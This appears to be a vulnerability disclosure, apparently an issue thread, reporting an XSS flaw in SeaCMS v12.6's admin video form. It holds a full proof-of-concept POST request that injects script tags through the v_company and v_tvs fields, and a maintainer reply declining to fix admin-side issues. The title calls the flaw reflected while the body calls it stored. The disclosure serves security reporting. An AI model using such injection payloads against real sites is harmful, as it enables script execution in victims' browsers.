seacms v12.6 statcode reflected xss vulnerability

[qianxiao996]

A xss vulnerability was discovered in seacms v12.6

There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvsparameter of /azdorq/admin_video.php?action=save&acttype=asdd

POC 1">

`POST /azdorq/admin_video.php?action=save&acttype=add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/5.4.1 NetType/WIFI Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 648 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/azdorq/admin_video.php?action=add Cookie: PHPSESSID=r8f7t3j9g41831ljekha8qbs6r; XDEBUG_SESSION=PHPSTORM; XLA_CI=a76a0d5d5f24d8e3bd55503a099c8013 Upgrade-Insecure-Requests: 1

v_commend=0&v_name=asdd&v_enname=11&v_color=&v_type=8&v_state=&v_pic=&v_spic=&v_gpic=&v_actor=&v_director=&v_commend=0&v_note=&v_tags=&select3=&v_publishyear=&select2=&v_lang=&select1=&v_publisharea=&select4=&v_ver=&v_hit=0&v_monthhit=0&v_weekhit=0&v_dayhit=0&v_digg=0&v_tread=0&v_len=&v_total=&v_nickname=&v_company=1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&v_tvs=1%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&v_douban=&v_mtime=&v_imdb=&v_score=&v_scorenum=&v_longtxt=&v_psd=&v_try=0&v_money=0&v_vip=&v_playfrom%5B1%5D=&v_playurl%5B1%5D=&m_downfrom%5B1%5D=&m_downurl%5B1%5D=&v_content=%3Cbr+%2F%3E&Submit=%E7%A1%AE%E5%AE%9A%E6%8F%90%E4%BA%A4`

1、choose this part and write poc to form

2、submit and view webpage

[ciweiin]

统一回复：后台问题不一一解决，如果有人能把后台都暴露那做站干啥。 Unified reply: the backstage problems are not solved one by one. If someone can expose the backstage, what will the station do.